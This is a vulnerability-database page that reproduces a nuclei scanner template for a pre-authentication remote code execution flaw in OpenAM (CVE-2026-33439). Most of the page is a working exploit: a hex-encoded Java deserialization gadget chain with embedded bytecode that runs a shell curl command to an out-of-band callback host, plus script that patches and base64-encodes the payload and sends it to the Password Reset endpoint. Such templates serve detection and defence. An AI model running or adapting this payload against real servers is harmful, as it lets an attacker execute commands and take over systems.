Lucene search
K

OpenAM <= 16.0.5 - Pre-Auth RCE via jato.clientSession Deserialization

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

OpenAM under 16.0.6 is vulnerable to pre-auth RCE via unsafe jato.clientSession deserialization.

Related
Refs
Code
id: CVE-2026-33439

info:
  name: OpenAM <= 16.0.5 - Pre-Auth RCE via jato.clientSession Deserialization
  author: DhiyaneshDk
  severity: critical
  description: |
    Open Access Management (OpenAM) is an access management solution. Prior to 16.0.6, OpenIdentityPlatform OpenAM is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypasses the WhitelistObjectInputStream mitigation that was applied to the jato.pageSession parameter after CVE-2021-35464.  This vulnerability is fixed in 16.0.6.
  impact: |
    An unauthenticated attacker can achieve arbitrary command execution on the server by sending a crafted serialized Java object as the jato.clientSession GET/POST parameter to any JATO ViewBean endpoint whose JSP contains <jato:form> tags (e.g., the Password Reset pages).
  remediation: Upgrade to OpenAM 16.0.6 or later.
  reference:
    - https://www.hacktron.ai/blog/openam-deserialization-pre-auth-rce
    - https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-33439
    epss-score: 0.1049
    epss-percentile: 0.95208
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 2
    vendor: openidentityplatform
    product: openam
    shodan-query: http.title:"OpenAM"
    fofa-query: title="OpenAM"
  tags: cve,cve2026,openam,deserialization,rce,jato,oast,oob

flow: http(1) && javascript(1)

http:
  - method: GET
    path:
      - "{{BaseURL}}/openam/ui/PWResetUserValidation"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "OpenAM","tfUserAttr")'
        condition: and
        internal: true

javascript:
  - code: |
      var net = require('nuclei/net');
      var P = "aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b787000000002737200306f72672e6170616368652e636c69636b2e636f6e74726f6c2e436f6c756d6e24436f6c756d6e436f6d70617261746f72000000000000000102000249000d617363656e64696e67536f72744c0006636f6c756d6e7400214c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f436f6c756d6e3b7870000000007372001f6f72672e6170616368652e636c69636b2e636f6e74726f6c2e436f6c756d6e00000000000000010200135a00086175746f6c696e6b5a000a65736361706548746d6c4900096d61784c656e6774684c000a6174747269627574657374000f4c6a6176612f7574696c2f4d61703b4c000a636f6d70617261746f7271007e00014c000964617461436c6173737400124c6a6176612f6c616e672f537472696e673b4c000a646174615374796c657371007e00074c00096465636f7261746f727400244c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f4465636f7261746f723b4c0006666f726d617471007e00084c000b686561646572436c61737371007e00084c000c6865616465725374796c657371007e00074c000b6865616465725469746c6571007e00084c000d6d657373616765466f726d61747400194c6a6176612f746578742f4d657373616765466f726d61743b4c00046e616d6571007e00084c000872656e64657249647400134c6a6176612f6c616e672f426f6f6c65616e3b4c0008736f727461626c6571007e000b4c00057461626c657400204c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f5461626c653b4c000d7469746c6550726f706572747971007e00084c0005776964746871007e000878700001000000007071007e000570707070707070707400106f757470757450726f7065727469657370707372001e6f72672e6170616368652e636c69636b2e636f6e74726f6c2e5461626c65000000000000000102001749000e62616e6e6572506f736974696f6e5a0009686f766572526f77735a00176e756c6c696679526f774c6973744f6e44657374726f7949000a706167654e756d6265724900087061676553697a65490013706167696e61746f724174746163686d656e745a000872656e6465724964490008726f77436f756e745a000a73686f7742616e6e65725a0008736f727461626c655a0006736f727465645a000f736f72746564417363656e64696e674c000763617074696f6e71007e00084c000a636f6c756d6e4c6973747400104c6a6176612f7574696c2f4c6973743b4c0007636f6c756d6e7371007e00074c000b636f6e74726f6c4c696e6b7400254c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f416374696f6e4c696e6b3b4c000b636f6e74726f6c4c69737471007e00104c000c6461746150726f766964657274002c4c6f72672f6170616368652f636c69636b2f6461746170726f76696465722f4461746150726f76696465723b4c000668656967687471007e00084c0009706167696e61746f727400254c6f72672f6170616368652f636c69636b2f636f6e74726f6c2f52656e64657261626c653b4c0007726f774c69737471007e00104c000c736f72746564436f6c756d6e71007e00084c0005776964746871007e0008787200286f72672e6170616368652e636c69636b2e636f6e74726f6c2e4162737472616374436f6e74726f6c00000000000000010200094c000e616374696f6e4c697374656e65727400214c6f72672f6170616368652f636c69636b2f416374696f6e4c697374656e65723b4c000a6174747269627574657371007e00074c00096265686176696f727374000f4c6a6176612f7574696c2f5365743b4c000c68656164456c656d656e747371007e00104c00086c697374656e65727400124c6a6176612f6c616e672f4f626a6563743b4c000e6c697374656e65724d6574686f6471007e00084c00046e616d6571007e00084c0006706172656e7471007e00174c00067374796c657371007e0007787070707070707074000a64756d6d795461626c65707000000002000100000000000000000000000100000000000000000170737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a6578700000000077040000000078737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f400000000000007708000000100000000078737200236f72672e6170616368652e636c69636b2e636f6e74726f6c2e416374696f6e4c696e6b00000000000000010200015a0007636c69636b6564787200256f72672e6170616368652e636c69636b2e636f6e74726f6c2e41627374726163744c696e6b00000000000000010200075a000864697361626c65645a001372656e6465724c6162656c416e64496d616765490008746162696e6465784c0008696d61676553726371007e00084c00056c6162656c71007e00084c000a706172616d657465727371007e00074c00057469746c6571007e00087871007e001470707070707074001664756d6d795461626c652d636f6e74726f6c4c696e6b71007e0018700000000000007070707000707070707070707070770400000003737200296f72672e6170616368652e78616c616e2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000749000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465784c000b5f617578436c617373657374002a4c6f72672f6170616368652f78616c616e2f78736c74632f72756e74696d652f486173687461626c653b5b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00084c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff70757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000003c8cafebabe00000041002907000201000b4f6f625472616e736c657407000401002f6f72672f6170616368652f78616c616e2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100083c636c696e69743e010003282956010004436f64650a0009000b07000a0100116a6176612f6c616e672f52756e74696d650c000c000d01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b07000f0100106a6176612f6c616e672f537472696e670800110100072f62696e2f73680800130100022d6308001501002a6375726c20687474703a2f2f5245504c4143454d455f4f4153545f504c414345484f4c4445525f55524c0a000900170c0018001901000465786563010028285b4c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b07001b0100136a6176612f6c616e672f5468726f7761626c6501000f4c696e654e756d6265725461626c6501000d537461636b4d61705461626c650100063c696e69743e0a000300200c001e00060100097472616e73666f726d010050284c6f72672f6170616368652f78616c616e2f78736c74632f444f4d3b5b4c6f72672f6170616368652f786d6c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000a457863657074696f6e730700250100286f72672f6170616368652f78616c616e2f78736c74632f5472616e736c6574457863657074696f6e010073284c6f72672f6170616368652f78616c616e2f78736c74632f444f4d3b4c6f72672f6170616368652f786d6c2f64746d2f44544d417869734974657261746f723b4c6f72672f6170616368652f786d6c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000a536f7572636546696c650100104f6f625472616e736c65742e6a6176610021000100030000000000040008000500060001000700000054000500000000001fb8000806bd000e590312105359041212535905121453b6001657a7000457b100010000001a001d001a0002001c0000000e000300000009001a000a001e000b001d0000000700025d07001a000001001e0006000100070000001d00010001000000052ab7001fb100000001001c000000060001000000060001002100220002002300000004000100240007000000190000000300000001b100000001001c0000000600010000000c0001002100260002002300000004000100240007000000190000000400000001b100000001001c0000000600010000000d000100270000000200287074000b4f6f625472616e736c6574707701007871007e002778";

      var CMD_OFF = 5114;   // "curl http://REPLACEME_OAST_PLACEHOLDER_URL" string start
      var LEN_OFF = 5110;   // CONSTANT_Utf8 length field (2 bytes, big-endian)
      var ARR_OFF = 4660;   // byte[] array length for the embedded class file (4 bytes, big-endian)
      var OLD_LEN = 42;     // Original placeholder string length in bytes
      var OLD_ARR = 968;    // Original class file size in bytes

      var cmd = "curl http://" + interactsh;
      var delta = cmd.length - OLD_LEN;

      function h(s) {
        var o = "";
        for (var i = 0; i < s.length; i++) {
          var c = s.charCodeAt(i).toString(16);
          o += c.length < 2 ? "0" + c : c;
        }
        return o;
      }

      var newHex = h(cmd);
      var oldHexLen = OLD_LEN * 2;
      var px = P.substring(0, CMD_OFF) + newHex + P.substring(CMD_OFF + oldHexLen);

      var ul = cmd.length.toString(16);
      while (ul.length < 4) ul = "0" + ul;
      px = px.substring(0, LEN_OFF) + ul + px.substring(LEN_OFF + 4);

      var al = (OLD_ARR + delta).toString(16);
      while (al.length < 8) al = "0" + al;
      px = px.substring(0, ARR_OFF) + al + px.substring(ARR_OFF + 8);

      var ba = [];
      for (var i = 0; i < px.length; i += 2) {
        ba.push(parseInt(px.substring(i, i + 2), 16));
      }
      var T = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
      var b = "";
      for (var i = 0; i < ba.length; i += 3) {
        var a0 = ba[i], a1 = i+1<ba.length?ba[i+1]:0, a2 = i+2<ba.length?ba[i+2]:0;
        b += T[(a0>>2)&63];
        b += T[((a0<<4)|(a1>>4))&63];
        b += i+1<ba.length ? T[((a1<<2)|(a2>>6))&63] : "=";
        b += i+2<ba.length ? T[a2&63] : "=";
      }
      var payload = b.split("+").join("-").split("/").join("_").split("=").join("");

      var ct = (tport === "443") ? "tls" : "tcp";
      var conn = net.Open(ct, thost + ":" + tport);
      var req = "GET /openam/ui/PWResetUserValidation?jato.clientSession=" + payload +
                " HTTP/1.1\r\nHost: " + thost + ":" + tport +
                "\r\nConnection: close\r\n\r\n";
      conn.SendHex(h(req));
      var resp = conn.RecvString(4096);
      conn.Close();
      Export(resp);

    args:
      thost: "{{Host}}"
      tport: "{{Port}}"
      interactsh: "{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
# digest: 4b0a0048304602210082b9191f12f5bcb60cad7f551a27830f34f703511260cb05a5e0549d57f7809602210097547d3f1db202fd78b7b41e76bbc1165be2aba2b6a3c1c034288a902dd3a611:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Apr 2026 16:25Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.8
CVSS 210
CVSS 49.3
EPSS0.99999
SSVC
20